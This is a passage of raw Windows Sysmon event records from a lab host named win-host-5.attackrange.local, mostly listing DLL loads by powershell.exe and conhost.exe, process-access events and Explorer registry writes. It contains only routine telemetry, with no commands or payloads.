CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001530472Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 734700x80000000000000001530471Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001530470Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001530469Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001530468Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001530467Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 13241300x80000000000000001530466Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498\VirtualDesktopBinary Data 12241200x80000000000000001530465Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000B0498 13241300x80000000000000001530464Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000012069A\VirtualDesktopBinary Data 12241200x80000000000000001530463Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.632{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000012069A 13241300x80000000000000001530462Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530461Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530460Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530459Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530458Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530457Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530456Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530455Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530454Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 10341000x80000000000000001530453Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530452Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 10341000x80000000000000001530451Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x80000000000000001530450Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001530449Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530448Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530447Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530446Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530445Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.617{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530444Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 734700x80000000000000001530443Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\msctf.dll10.0.14393.4225 (rs1_release.210127-1811)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=1FD254D30743876981194F7E17ECDB6F,SHA256=0CB67AC140097A888B7ED85C9A31F8967D16661B82557CE5D61FA70A85BDF8B8trueMicrosoft WindowsValid 10341000x80000000000000001530442Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530441Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530440Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001530439Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001530438Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001530437Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001530436Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001530435Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001530434Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001530433Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 13241300x80000000000000001530432Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.601{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530431Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.601{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 10341000x80000000000000001530430Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530429Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft WindowsValid 10341000x80000000000000001530428Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}54245416C:\Windows\system32\conhost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530427Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001530426Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.601{21761711-6127-6080-BE5D-00000000BB01}5424C:\Windows\System32\conhost.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft 